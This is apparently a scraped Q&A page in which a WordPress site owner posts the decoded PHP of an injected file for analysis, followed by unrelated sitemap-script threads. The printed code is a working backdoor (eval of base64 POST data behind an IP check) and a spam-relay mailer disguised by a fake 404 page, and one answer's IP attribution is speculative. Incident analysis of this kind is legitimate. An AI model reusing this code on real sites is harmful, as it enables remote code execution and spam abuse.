PHP - Need help to understand injected code - php

I discovered a lot of requests to a fishy file in a plugin on my WordPress site. In it, I found a long string, a mapping function for each character used in the string, and an execution of the decoded string. This is the code the decoder outputs; any help in understanding what it does would be great!
<?php
// Request dispatcher of the injected file. All control is via POST fields, so in access
// logs this traffic shows up only as POST requests to this file's path.
// Branch 1 - remote code execution: when "code" and "custom_action" are both present and
// the client address passes is_good_ip(), the base64-decoded "code" field is run by eval().
// Only the presence of "custom_action" is tested; its value is not read in this listing.
if(isset($_POST["code"]) && isset($_POST["custom_action"]) && is_good_ip($_SERVER['REMOTE_ADDR']))
{
eval(base64_decode($_POST["code"]));
exit();
}
// Branch 2 - type "1" starts the bulk mailer. No is_good_ip() check guards this branch.
if (isset($_POST["type"]) && $_POST["type"]=="1")
{
type1_send();
exit();
}
// type "2" is an empty branch: nothing runs here and execution falls through to error_404().
elseif (isset($_POST["type"]) && $_POST["type"]=="2")
{
}
// Any other "type" value is echoed back unescaped and the script stops.
// NOTE(review): presumably a liveness check for the operator - not confirmed by the code.
elseif (isset($_POST["type"]))
{
echo $_POST["type"];
exit();
}
// Every other request receives the imitation "not found" page built by error_404().
error_404();
/**
 * Gate for the eval() branch: returns TRUE when $ip contains one of two hard-coded fragments.
 *
 * strstr() finds the fragment anywhere in the string, not only at the start, so the
 * fragments are not necessarily the leading octets of an address: a constructed example
 * such as "16.185.239.7" passes as well. Attributing the operator from these two values
 * alone is therefore unreliable.
 *
 * @param string $ip Address to test; the dispatcher passes $_SERVER['REMOTE_ADDR'].
 * @return bool TRUE on the first fragment found, FALSE otherwise.
 */
function is_good_ip($ip)
{
$goods = Array("6.185.239.", "8.138.118.");
foreach ($goods as $good)
{
// Loose comparison: any non-empty strstr() result counts as a match.
if (strstr($ip, $good) != FALSE)
{
return TRUE;
}
}
return FALSE;
}
/**
 * Bulk mail sender driven entirely by POST fields (the spam-relay part of the sample).
 *
 * Reads recipient, subject, body, sender and X-Mailer lists from the request, expands the
 * template macros in them and calls send_mail() once per recipient. Uploaded files in
 * $_FILES are renamed here and later attached by send_mail().
 */
function type1_send()
{
// All five lists must be present, otherwise the script exits silently.
if(!isset($_POST["emails"])
OR !isset($_POST["themes"])
OR !isset($_POST["messages"])
OR !isset($_POST["froms"])
OR !isset($_POST["mailers"])
)
{
exit();
}
// Undo magic-quotes escaping on every POST field.
// get_magic_quotes_gpc() no longer exists in PHP 8, so this path only runs on older PHP.
if(get_magic_quotes_gpc())
{
foreach($_POST as $key => $post)
{
$_POST[$key] = stripcslashes($post);
}
}
// Each list arrives as base64-encoded serialized PHP data.
// NOTE(review): the "#" before unserialize() is presumably a page-extraction artefact for the
// "@" error-suppression operator; as printed, "#" starts a comment and these lines do not parse.
// unserialize() on request data also exposes the host to PHP object injection.
// "aliases" and "passes" are read without an isset() check.
$emails = #unserialize(base64_decode($_POST["emails"]));
$themes = #unserialize(base64_decode($_POST["themes"]));
$messages = #unserialize(base64_decode($_POST["messages"]));
$froms = #unserialize(base64_decode($_POST["froms"]));
$mailers = #unserialize(base64_decode($_POST["mailers"]));
$aliases = #unserialize(base64_decode($_POST["aliases"]));
$passes = #unserialize(base64_decode($_POST["passes"]));
// Overwrite request metadata with fixed values before any mail is sent.
// NOTE(review): presumably so the real script path and client address do not end up in
// anything recorded at send time - confirm against the mail configuration of the host.
if(isset($_SERVER))
{
$_SERVER['PHP_SELF'] = "/";
$_SERVER['REMOTE_ADDR'] = "127.0.0.1";
if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
{
$_SERVER['HTTP_X_FORWARDED_FOR'] = "127.0.0.1";
}
}
// Rename each uploaded file to the macro-expanded alias supplied under the same key.
if(isset($_FILES))
{
foreach($_FILES as $key => $file)
{
$filename = alter_macros($aliases[$key]);
$filename = num_macros($filename);
$filename = text_macros($filename);
$filename = xnum_macros($filename);
$_FILES[$key]["name"] = $filename;
}
}
if(empty($emails))
{
exit();
}
// One message per recipient; subject, body, sender and X-Mailer are each picked at random
// from the supplied lists and run through the macro expanders so no two mails are identical.
foreach ($emails as $fteil => $email)
{
$theme = $themes[array_rand($themes)];
$theme = alter_macros($theme["theme"]);
$theme = num_macros($theme);
$theme = text_macros($theme);
$theme = xnum_macros($theme);
$message = $messages[array_rand($messages)];
$message = alter_macros($message["message"]);
$message = num_macros($message);
$message = text_macros($message);
$message = xnum_macros($message);
//$message = pass_macros($message, $passes);
// [FTEIL] in the body is replaced by the array key of the current recipient.
$message = fteil_macros($message, $fteil);
$from = $froms[array_rand($froms)];
$from = alter_macros($from["from"]);
$from = num_macros($from);
$from = text_macros($from);
$from = xnum_macros($from);
// Without a "[CUSTOM]" marker the sender is rewritten by from_host() to use this site's
// host name; with the marker, the marker is stripped and the sender is used as given.
if (strstr($from, "[CUSTOM]") == FALSE)
{
$from = from_host($from);
}
else
{
$from = str_replace("[CUSTOM]", "", $from);
}
$mailer = $mailers[array_rand($mailers)];
send_mail($from, $email, $theme, $message, $mailer);
}
}
/**
 * Builds one multipart/alternative message (plain-text and HTML part) and hands it to mail().
 *
 * Every header value comes from request data and is interpolated without CR/LF filtering.
 * Files present in $_FILES are appended as base64 attachments.
 *
 * @param string $from   Sender, used for both From and Reply-To.
 * @param string $to     Recipient address.
 * @param string $subj   Subject line.
 * @param string $text   HTML body; the plain-text part is strip_tags() of it.
 * @param string $mailer Value for the X-Mailer header.
 */
function send_mail($from, $to, $subj, $text, $mailer)
{
$head = "";
// Boundary id derived from the current time via uniqid().
$un = strtoupper(uniqid(time()));
$head .= "From: $from\n";
$head .= "X-Mailer: $mailer\n";
$head .= "Reply-To: $from\n";
$head .= "Mime-Version: 1.0\n";
$head .= "Content-Type: multipart/alternative;";
$head .= "boundary=\"----------".$un."\"\n\n";
$plain = strip_tags($text);
$zag = "------------".$un."\nContent-Type: text/plain; charset=\"ISO-8859-1\"; format=flowed\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n".$plain."\n\n";
$zag .= "------------".$un."\nContent-Type: text/html; charset=\"ISO-8859-1\";\n";
$zag .= "Content-Transfer-Encoding: 7bit\n\n$text\n\n";
$zag .= "------------".$un."--";
// Attachment parts are appended after the closing delimiter written just above.
if(count($_FILES) > 0)
{
foreach($_FILES as $file)
{
if(file_exists($file["tmp_name"]))
{
$f = fopen($file["tmp_name"], "rb");
$zag .= "------------".$un."\n";
$zag .= "Content-Type: application/octet-stream;";
$zag .= "name=\"".$file["name"]."\"\n";
$zag .= "Content-Transfer-Encoding:base64\n";
$zag .= "Content-Disposition:attachment;";
$zag .= "filename=\"".$file["name"]."\"\n\n";
$zag .= chunk_split(base64_encode(fread($f, filesize($file["tmp_name"]))))."\n";
fclose($f);
}
}
}
// NOTE(review): "#mail" is presumably "@mail" before page extraction; as printed it does not parse.
// With the POST field "verbose" set, the response body is "SENDED" or "FAIL" per message -
// literal strings that can serve as response-side indicators of this sample.
if(#mail($to, $subj, $zag, $head))
{
if(!empty($_POST['verbose']))
echo "SENDED";
}
else
{
if(!empty($_POST['verbose']))
echo "FAIL";
}
}
/**
 * Expands "{a|b|c}" alternation groups: each group is replaced by one randomly chosen option.
 *
 * str_replace() swaps every occurrence of an identical group for the same choice.
 *
 * @param string $content Template text.
 * @return string Text with all groups resolved.
 */
function alter_macros($content)
{
// Ungreedy (U) match of everything between "{" and the next "}".
preg_match_all('#{(.*)}#Ui', $content, $matches);
for($i = 0; $i < count($matches[1]); $i++)
{
$ns = explode("|", $matches[1][$i]);
$c2 = count($ns);
$rand = rand(0, ($c2 - 1));
$content = str_replace("{".$matches[1][$i]."}", $ns[$rand], $content);
}
return $content;
}
/**
 * Replaces "[TEXT-min-max]" and "[TEXT-n]" tokens with random lowercase filler words.
 *
 * The two-number form picks a random length between min and max; the one-number form uses
 * exactly n characters. Each token is replaced individually (limit 1), so repeated tokens
 * get different words.
 *
 * @param string $content Template text.
 * @return string Text with the tokens replaced by generate_word() output.
 */
function text_macros($content)
{
preg_match_all('#\[TEXT\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$word = generate_word($rand);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
preg_match_all('#\[TEXT\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$count = $matches[1][$i];
$word = generate_word($count);
$content = preg_replace("/".preg_quote($matches[0][$i])."/", $word, $content, 1);
}
return $content;
}
/**
 * Replaces "[NUM-n]" tokens with a random number that has exactly n digits.
 *
 * str_replace() substitutes every identical token with the same number.
 *
 * @param string $content Template text.
 * @return string Text with the tokens replaced.
 */
function xnum_macros($content)
{
preg_match_all('#\[NUM\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$num = $matches[1][$i];
// Smallest and largest value with $num digits, e.g. 100 and 999 for n = 3.
$min = pow(10, $num - 1);
$max = pow(10, $num) - 1;
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
/**
 * Replaces "[RAND-min-max]" tokens with a random integer between min and max.
 *
 * str_replace() substitutes every identical token with the same number.
 *
 * @param string $content Template text.
 * @return string Text with the tokens replaced.
 */
function num_macros($content)
{
preg_match_all('#\[RAND\-([[:digit:]]+)\-([[:digit:]]+)\]#', $content, $matches);
for($i = 0; $i < count($matches[0]); $i++)
{
$min = $matches[1][$i];
$max = $matches[2][$i];
$rand = rand($min, $max);
$content = str_replace($matches[0][$i], $rand, $content);
}
return $content;
}
/**
 * Returns a random lowercase string of $length characters.
 *
 * The alphabet below has 25 letters: "w" is absent and "y"/"x" are swapped. Filler words
 * produced by this sample therefore never contain a "w", which can help recognise its output.
 *
 * @param int|string $length Number of characters to generate.
 * @return string The generated word (empty for a length of 0).
 */
function generate_word($length)
{
$chars = 'abcdefghijklmnopqrstuvyxz';
$numChars = strlen($chars);
$string = '';
for($i = 0; $i < $length; $i++)
{
$string .= substr($chars, rand(1, $numChars) - 1, 1);
}
return $string;
}
/**
 * Replaces "[PASS]" with the last element of $passes.
 *
 * The only call to this function in the listing is commented out in type1_send().
 * $passes is taken by value, so array_pop() does not shorten the caller's array.
 *
 * @param string $content Template text.
 * @param array  $passes  List of values; the last one is used.
 * @return string Text with "[PASS]" replaced.
 */
function pass_macros($content, $passes)
{
$pass = array_pop($passes);
return str_replace("[PASS]", $pass, $content);
}
/**
 * Replaces "[FTEIL]" with $fteil; type1_send() passes the array key of the current recipient.
 *
 * @param string     $content Template text.
 * @param int|string $fteil   Replacement value.
 * @return string Text with "[FTEIL]" replaced.
 */
function fteil_macros($content, $fteil)
{
return str_replace("[FTEIL]", $fteil, $content);
}
/**
 * Tests whether $str is a dotted-quad IPv4 address (first octet 1-255, the others 0-255).
 *
 * @param string $str Candidate host string.
 * @return int|false Result of preg_match(): 1 on match, 0 otherwise, false on regex error.
 */
function is_ip($str) {
return preg_match("/^([1-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(\.([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])){3}$/",$str);
}
/**
 * Rewrites the sender so that its domain part is the compromised site's own host name.
 *
 * The host is taken from the Host request header with a leading "www." or "ftp." removed.
 * If the host is a bare IP address the sender is returned unchanged.
 *
 * NOTE(review): every "#" in this function is presumably "@" before page extraction - the
 * error-suppression operator on the first line and the address separator in explode() and
 * in the rebuilt string (the trailing ">" suggests a "Name <user@host>" sender). As printed,
 * the first line does not parse.
 *
 * @param string $content Sender string from the template.
 * @return string Sender with the part after the separator replaced by the site host.
 */
function from_host($content)
{
$host = preg_replace('/^(www|ftp)\./i','',#$_SERVER['HTTP_HOST']);
if (is_ip($host))
{
return $content;
}
$tokens = explode("#", $content);
$content = $tokens[0] . "#" . $host . ">";
return $content;
}
/**
 * Answers with a 404 status and a copy of the site's own "not found" page.
 *
 * The page is obtained by requesting a fixed path from the same host (one the author
 * evidently expects not to exist) and swapping that path for the URI actually requested,
 * so a casual visitor sees the site's normal error page.
 * Only this function sets a 404 status; the eval() and mailer branches exit before
 * reaching it. The fixed path below is a literal that can be searched for in the site's
 * own access logs.
 */
function error_404()
{
header("HTTP/1.1 404 Not Found");
// Requested URI without its query string.
$uri = preg_replace('/(\?).*$/', '', $_SERVER['REQUEST_URI'] );
$content = custom_http_request1("http://".$_SERVER['HTTP_HOST']."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
$content = str_replace( "/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA", $uri, $content );
exit( $content );
}
/**
 * Minimal HTTP/1.0 client over fsockopen(); used by error_404() to fetch a page from the
 * site itself.
 *
 * @param string|array $params A URL, or an array with 'url' and optional 'method' (GET/POST),
 *                             'data', 'port', 'timeout', 'return' ('content', 'headers' or
 *                             'array'), 'User-Agent', 'referer', 'cookie', 'redirect'.
 * @return string|array|false Body, parsed headers, or both, depending on 'return';
 *                            FALSE on an empty URL, unsupported method or failed connection.
 *
 * NOTE(review): the "#" before fsockopen/fwrite/feof/fread/fclose/is_object is presumably "@"
 * before page extraction; as printed, "#" starts a comment and several lines do not parse.
 */
function custom_http_request1($params)
{
if( ! is_array($params) )
{
$params = array(
'url' => $params,
'method' => 'GET'
);
}
if( $params['url']=='' ) return FALSE;
if( ! isset($params['method']) ) $params['method'] = (isset($params['data'])&&is_array($params['data'])) ? 'POST' : 'GET';
$params['method'] = strtoupper($params['method']);
if( ! in_array($params['method'], array('GET', 'POST')) ) return FALSE;
/* Normalise the URL */
$url = parse_url($params['url']);
if( ! isset($url['scheme']) ) $url['scheme'] = 'http';
if( ! isset($url['path']) ) $url['path'] = '/';
if( ! isset($url['host']) && isset($url['path']) )
{
if( strpos($url['path'], '/') )
{
$url['host'] = substr($url['path'], 0, strpos($url['path'], '/'));
$url['path'] = substr($url['path'], strpos($url['path'], '/'));
}
else
{
$url['host'] = $url['path'];
$url['path'] = '/';
}
}
$url['path'] = preg_replace("/[\\/]+/", "/", $url['path']);
if( isset($url['query']) ) $url['path'] .= "?{$url['query']}";
$port = isset($params['port']) ? $params['port']
: ( isset($url['port']) ? $url['port'] : ($url['scheme']=='https'?443:80) );
$timeout = isset($params['timeout']) ? $params['timeout'] : 30;
if( ! isset($params['return']) ) $params['return'] = 'content';
$scheme = $url['scheme']=='https' ? 'ssl://':'';
$fp = #fsockopen($scheme.$url['host'], $port, $errno, $errstr, $timeout);
if( $fp )
{
/* Mozilla */
/* Default User-Agent is a fixed mobile-browser string; it will appear in the site's own
   access log for the self-request made by error_404(). */
if( ! isset($params['User-Agent']) ) $params['User-Agent'] = "Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16";
$request = "{$params['method']} {$url['path']} HTTP/1.0\r\n";
$request .= "Host: {$url['host']}\r\n";
$request .= "User-Agent: {$params['User-Agent']}"."\r\n";
if( isset($params['referer']) ) $request .= "Referer: {$params['referer']}\r\n";
if( isset($params['cookie']) )
{
$cookie = "";
if( is_array($params['cookie']) ) {foreach( $params['cookie'] as $k=>$v ) $cookie .= "$k=$v; "; $cookie = substr($cookie,0,-2);}
else $cookie = $params['cookie'];
if( $cookie!='' ) $request .= "Cookie: $cookie\r\n";
}
$request .= "Connection: close\r\n";
if( $params['method']=='POST' )
{
/* $data is appended to without being initialised first. */
if( isset($params['data']) && is_array($params['data']) )
{
foreach($params['data'] AS $k => $v)
$data .= urlencode($k).'='.urlencode($v).'&';
if( substr($data, -1)=='&' ) $data = substr($data,0,-1);
}
$data .= "\r\n\r\n";
$request .= "Content-type: application/x-www-form-urlencoded\r\n";
$request .= "Content-length: ".strlen($data)."\r\n";
}
$request .= "\r\n";
if( $params['method'] == 'POST' ) $request .= $data;
#fwrite ($fp,$request); /* Send request */
$res = ""; $headers = ""; $h_detected = false;
while( !#feof($fp) )
{
$res .= #fread($fp, 1024); /* read the content */
/* Check whether the headers are present in the content */
if( ! $h_detected && strpos($res, "\r\n\r\n")!==FALSE )
{
/* headers have been read - adjust the content */
$h_detected = true;
$headers = substr($res, 0, strpos($res, "\r\n\r\n"));
$res = substr($res, strpos($res, "\r\n\r\n")+4);
/* Headers to Array */
if( $params['return']=='headers' || $params['return']=='array'
|| (isset($params['redirect']) && $params['redirect']==true) )
{
$h = explode("\r\n", $headers);
$headers = array();
foreach( $h as $k=>$v )
{
if( strpos($v, ':') )
{
$k = substr($v, 0, strpos($v, ':'));
$v = trim(substr($v, strpos($v, ':')+1));
}
$headers[strtoupper($k)] = $v;
}
}
/* Follow a Location header by calling this function again, at most 10 times.
   The early return leaves the socket to be closed by PHP rather than by fclose(). */
if( isset($params['redirect']) && $params['redirect']==true && isset($headers['LOCATION']) )
{
$params['url'] = $headers['LOCATION'];
if( !isset($params['redirect-count']) ) $params['redirect-count'] = 0;
if( $params['redirect-count']<10 )
{
$params['redirect-count']++;
$func = __FUNCTION__;
/* The $this test suggests the function was lifted from a class - not confirmed here. */
return #is_object($this) ? $this->$func($params) : $func($params);
}
}
if( $params['return']=='headers' ) return $headers;
}
}
#fclose($fp);
}
else return FALSE;/* $errstr.$errno; */
if( $params['return']=='array' ) $res = array('headers'=>$headers, 'content'=>$res);
return $res;
}
Edit: Apparently, I am doing something wrong with my question (2 instant downvotes). If you could tell me what I am doing wrong, I will try to correct it/remove my question.

This is a fun one, while I haven't a lot of time right now to look over the code I can give you some generalizations of common injections and attacks on websites, in particular a CMS like WordPress. Although this as a part of a plugin, may just be a malicious plugin and not an injection attack, or it may be a flaw or exploit in the plugin being used.
Initial observation, the code comments in Russian stand out.
This code looks like it might be for a spam relay. Taking messages and trying to leverage whatever sendmail you have setup. That's just a high level guess right now.
Most attacks (though not necessarily this one) are geared toward delivering malware to visitors of the site, usually through ActiveX or iframe tricks. I didn't see any of that here, which leads me to believe that the spam-relay explanation (#2) is more likely.
This may also be trying to index all the content of your site/server that it can, and then send it out to the attacker so that they can sift the data looking for important information like config files and passwords.
I will do a deeper dive into this code when I'm not at work :) because I love this stuff. In the meantime you'll probably get a better response from the security stack pages than from Stack Overflow or, as I mentioned in my comment, check with the hackers of http://hackthissite.org on this one. If this was an exploit, they might even be able to track down the author and the specific exploit. Generally, code like this is used as part of a more generic tool that probes and attacks, a bot, and is not the work of an actual person. You should also possibly share the name of the plugin, as it may be malicious, or a known exploit may have been published.
Either way, you need to perform a deep security screening on the site in question, and assume that you've been hacked, and take all the proper steps accordingly.
-- Edit --
This code block is interesting:
// Allow-list check used by the sample before it runs eval().
// strstr() matches each fragment anywhere in $ip, not only at the start, so the fragments
// need not be the leading octets of an address (a constructed "16.185.239.7" also passes).
function is_good_ip($ip)
{
$goods = Array("6.185.239.", "8.138.118.");
foreach ($goods as $good)
{
if (strstr($ip, $good) != FALSE)
{
return TRUE;
}
}
return FALSE;
}
One of those IPs resolves to Fort Huachuca DoD Network Information Center. I'm probably going to delete this answer now... (turns out this may not be an IP but a version number; my paranoia got the best of me). You should probably post this question at https://security.stackexchange.com/ instead to avoid more downvotes.

Related

Change php script with variables from working in http to working in shell

I use a script from here to generate my sitemaps.
I can call it with the browser with http://www.example.com/sitemap.php?update=pages and its working fine.
I need to call it as shell script so that I can automate it with the windows task scheduler. But the script needs to be changed to get the variables ?update=pages. But I don't manage to change it correctly.
Could anybody help me so that I can execute the script from command line with
...\php C:\path\to\script\sitemap.php update=pages. It would also be fine for me to hardcode the variables into the script since I wont change them anyway.
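// Public base URL that every sitemap entry is prefixed with.
define("BASE_URL", "http://www.example.com/");
// Filesystem directory the sitemap files are written to.
// Under the CLI SAPI $_SERVER['DOCUMENT_ROOT'] is empty, which would make BASE_URI "/" and
// send the files to the filesystem root. Fall back to this script's directory in that case
// (assumes the script sits in the web root, as the URL /sitemap.php suggests).
define ('BASE_URI', (!empty($_SERVER['DOCUMENT_ROOT']) ? $_SERVER['DOCUMENT_ROOT'] : __DIR__) . '/');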
/**
 * Writes sitemap XML files (optionally gzip-compressed) below BASE_URI and keeps a sitemap
 * index file that lists them. URLs are buffered in memory and flushed to a new file every
 * 50000 entries, on page(), on close() and on destruction.
 */
class Sitemap {
// '.gz' when output is compressed, '' otherwise; appended to every file name.
private $compress;
// Name of the current sitemap section; part of the file name.
private $page = 'index';
// Running file number within the current section.
private $index = 1;
// Number of URLs buffered for the current file, counted from 1.
private $count = 1;
// Buffered entries: plain URL strings or arrays of tag => value.
private $urls = array();
/**
 * @param bool $compress Whether to gzip the generated files.
 */
public function __construct ($compress=true) {
ini_set('memory_limit', '75M'); // 50M required per tests
$this->compress = ($compress) ? '.gz' : '';
}
/**
 * Flushes the buffered URLs and starts a new section named $name.
 */
public function page ($name) {
$this->save();
$this->page = $name;
$this->index = 1;
}
/**
 * Buffers one URL. Optional values that are empty or invalid are dropped.
 *
 * @param string $url        Path appended to BASE_URL.
 * @param string $lastmod    Any strtotime()-parsable date.
 * @param string $changefreq One of always/hourly/daily/weekly/monthly/yearly/never.
 * @param string $priority   Number whose absolute value is at most 1.
 */
public function url ($url, $lastmod='', $changefreq='', $priority='') {
// htmlspecialchars() escapes the characters that are special in XML text.
$url = htmlspecialchars(BASE_URL . 'xx' . $url);
$lastmod = (!empty($lastmod)) ? date('Y-m-d', strtotime($lastmod)) : false;
$changefreq = (!empty($changefreq) && in_array(strtolower($changefreq), array('always', 'hourly', 'daily', 'weekly', 'monthly', 'yearly', 'never'))) ? strtolower($changefreq) : false;
$priority = (!empty($priority) && is_numeric($priority) && abs($priority) <= 1) ? round(abs($priority), 1) : false;
if (!$lastmod && !$changefreq && !$priority) {
$this->urls[] = $url;
} else {
$url = array('loc'=>$url);
if ($lastmod !== false) $url['lastmod'] = $lastmod;
if ($changefreq !== false) $url['changefreq'] = $changefreq;
if ($priority !== false) $url['priority'] = ($priority < 1) ? $priority : '1.0';
$this->urls[] = $url;
}
// Flush once the file holds 50000 URLs.
if ($this->count == 50000) {
$this->save();
} else {
$this->count++;
}
}
/**
 * Flushes whatever is still buffered.
 */
public function close() {
$this->save();
}
/**
 * Writes the buffered URLs to the next sitemap file, removes stale higher-numbered files
 * of the same section and registers the new file in the index. Does nothing when the
 * buffer is empty.
 */
private function save () {
if (empty($this->urls)) return;
$file = "sitemaps/xx-sitemap-{$this->page}-{$this->index}.xml{$this->compress}";
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($this->urls as $url) {
$xml .= ' <url>' . "\n";
if (is_array($url)) {
foreach ($url as $key => $value) $xml .= " <{$key}>{$value}</{$key}>\n";
} else {
$xml .= " <loc>{$url}</loc>\n";
}
$xml .= ' </url>' . "\n";
}
$xml .= '</urlset>' . "\n";
$this->urls = array();
if (!empty($this->compress)) $xml = gzencode($xml, 9);
// NOTE(review): the fopen() result is not checked; a missing or read-only sitemaps/
// directory makes the fwrite()/fclose() calls below fail.
$fp = fopen(BASE_URI . $file, 'wb');
fwrite($fp, $xml);
fclose($fp);
$this->index++;
$this->count = 1;
$num = $this->index; // should have already been incremented
// NOTE(review): the loop tests for "xxb-sitemap-..." but deletes "xxc-sitemap-...", and
// neither name carries the "sitemaps/xx-" prefix used for $file above - these look like
// placeholder edits; confirm the intended paths before running this.
while (file_exists(BASE_URI . "xxb-sitemap-{$this->page}-{$num}.xml{$this->compress}")) {
unlink(BASE_URI . "xxc-sitemap-{$this->page}-{$num}.xml{$this->compress}");
$num++;
}
$this->index($file);
}
/**
 * Rewrites the sitemap index: keeps existing entries whose files still exist and adds or
 * refreshes the entry for $file with today's date.
 */
private function index ($file) {
$sitemaps = array();
$index = "sitemaps/xx-sitemap-index.xml{$this->compress}";
if (file_exists(BASE_URI . $index)) {
$xml = (!empty($this->compress)) ? gzfile(BASE_URI . $index) : file(BASE_URI . $index);
$tags = $this->xml_tag(implode('', $xml), array('sitemap'));
foreach ($tags as $xml) {
$loc = str_replace(BASE_URL, '', $this->xml_tag($xml, 'loc'));
$lastmod = $this->xml_tag($xml, 'lastmod');
$lastmod = ($lastmod) ? date('Y-m-d', strtotime($lastmod)) : date('Y-m-d');
if (file_exists(BASE_URI . $loc)) $sitemaps[$loc] = $lastmod;
}
}
$sitemaps[$file] = date('Y-m-d');
$xml = '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
$xml .= '<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">' . "\n";
foreach ($sitemaps as $loc => $lastmod) {
$xml .= ' <sitemap>' . "\n";
$xml .= ' <loc>' . BASE_URL . $loc . '</loc>' . "\n";
$xml .= ' <lastmod>' . $lastmod . '</lastmod>' . "\n";
$xml .= ' </sitemap>' . "\n";
}
$xml .= '</sitemapindex>' . "\n";
if (!empty($this->compress)) $xml = gzencode($xml, 9);
$fp = fopen(BASE_URI . $index, 'wb');
fwrite($fp, $xml);
fclose($fp);
}
/**
 * Extracts the text of the first <$tag> element by string search (no XML parser).
 * With an array as $tag, returns the contents of every occurrence of $tag[0].
 *
 * @param string       $xml XML text to search.
 * @param string|array $tag Tag name, or a one-element array to collect all occurrences.
 * @param int          $end Set to the offset just past the closing tag.
 * @return string|array|false
 */
private function xml_tag ($xml, $tag, &$end='') {
if (is_array($tag)) {
$tags = array();
while ($value = $this->xml_tag($xml, $tag[0], $end)) {
$tags[] = $value;
$xml = substr($xml, $end);
}
return $tags;
}
$pos = strpos($xml, "<{$tag}>");
if ($pos === false) return false;
$start = strpos($xml, '>', $pos) + 1;
$length = strpos($xml, "</{$tag}>", $start) - $start;
// NOTE(review): strpos() + 1 is never false, so the check on the return line always
// passes, and a missing closing tag yields a negative $length instead of a failure.
$end = strpos($xml, '>', $start + $length) + 1;
return ($end !== false) ? substr($xml, $start, $length) : false;
}
/**
 * Flushes any remaining URLs when the object is destroyed.
 */
public function __destruct () {
$this->save();
}
}
// start part 2
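// Regenerate the "pages" sitemap when the request asks for it (see get()).
$sitemap = new Sitemap;
if (get('pages')) {
    $sitemap->page('pages');
    // NOTE(review): the mysql_* functions were removed in PHP 7; this call only works on
    // older PHP and needs a connection opened elsewhere.
    $result = mysql_query("SELECT uri FROM app_uri");
    // The query selects a single column, so only $url is unpacked. The original also
    // unpacked a second value that no row contains and passed it on as the last-modified date.
    while (list($url) = mysql_fetch_row($result)) {
        $sitemap->url($url, '', 'monthly');
    }
}
$sitemap->close();
unset ($sitemap);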
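/**
 * Tells whether the sitemap section $name was requested.
 *
 * Over HTTP the sections come from the query string (?update=pages). On the command line
 * there is no query string, so the first "update=..." argument is used instead, e.g.
 * "php sitemap.php update=pages". Matching is by substring, as before.
 *
 * @param string $name Section name to look for.
 * @return bool TRUE when $name occurs in the requested update value.
 */
function get ($name) {
    $update = null;
    if (isset($_GET['update'])) {
        $update = $_GET['update'];
    } elseif (PHP_SAPI === 'cli' && !empty($_SERVER['argv'])) {
        // Skip argv[0], which is the script name.
        foreach (array_slice($_SERVER['argv'], 1) as $arg) {
            if (strpos($arg, 'update=') === 0) {
                $update = substr($arg, strlen('update='));
                break;
            }
        }
    }
    // An array value (update[]=...) cannot be searched with strpos(); treat it as no match.
    return is_string($update) && strpos($update, $name) !== false;
}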
?>
You could install wget (it's available for Windows as well) and then call the URL via localhost in the task scheduler script:
wget.exe "http://localhost/path/to/script.php?pages=test"
This way you wouldn't have to rewrite the php script.
Otherwise, if the script is meant for shell usage only, then pass variables via command line:
php yourscript.php variable1 variable2 ...
In the PHP script you can then access those variables using the $argv variable:
$variable1 = $argv[1];
$variable2 = $argv[2];
have a look on:
How to pass GET variables to php file with Shell?
which already answered the same question :).

php sitemap for large websites

I want to create a sitemap for a page with more than 30.000.000 pages. The page is daily updating, removing and adding new pages.
I found this php script which I would like to run with a cron job.
Sitemap php script
I have all URIs in the table "myuri" in the column "uri" entries are written e.g. "/this-is-a-page.html". What parameters do I need to add to the script to get it running on my table?
<?php
/*
* author: Kyle Gadd
* documentation: http://www.php-ease.com/classes/sitemap.html
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
/**
 * Writes sitemap XML files (optionally gzip-compressed) below BASE_URI, keeps a sitemap
 * index file that lists them and can notify search engines about the index. URLs are
 * buffered in memory and flushed to a new file every 50000 entries, on page(), on close()
 * and on destruction. BASE_URL and BASE_URI are constants defined outside this class.
 */
class Sitemap {
// '.gz' when output is compressed, '' otherwise; appended to every file name.
private $compress;
// Name of the current sitemap section; part of the file name.
private $page = 'index';
// Running file number within the current section.
private $index = 1;
// Number of URLs buffered for the current file, counted from 1.
private $count = 1;
// Buffered entries: plain URL strings or arrays of tag => value.
private $urls = array();
/**
 * @param bool $compress Whether to gzip the generated files.
 */
public function __construct ($compress=true) {
ini_set('memory_limit', '75M'); // 50M required per tests
$this->compress = ($compress) ? '.gz' : '';
}
/**
 * Flushes the buffered URLs and starts a new section named $name.
 */
public function page ($name) {
$this->save();
$this->page = $name;
$this->index = 1;
}
/**
 * Buffers one URL. Optional values that are empty or invalid are dropped.
 *
 * @param string $url        Path appended to BASE_URL.
 * @param string $lastmod    Any strtotime()-parsable date.
 * @param string $changefreq One of always/hourly/daily/weekly/monthly/yearly/never.
 * @param string $priority   Number whose absolute value is at most 1.
 */
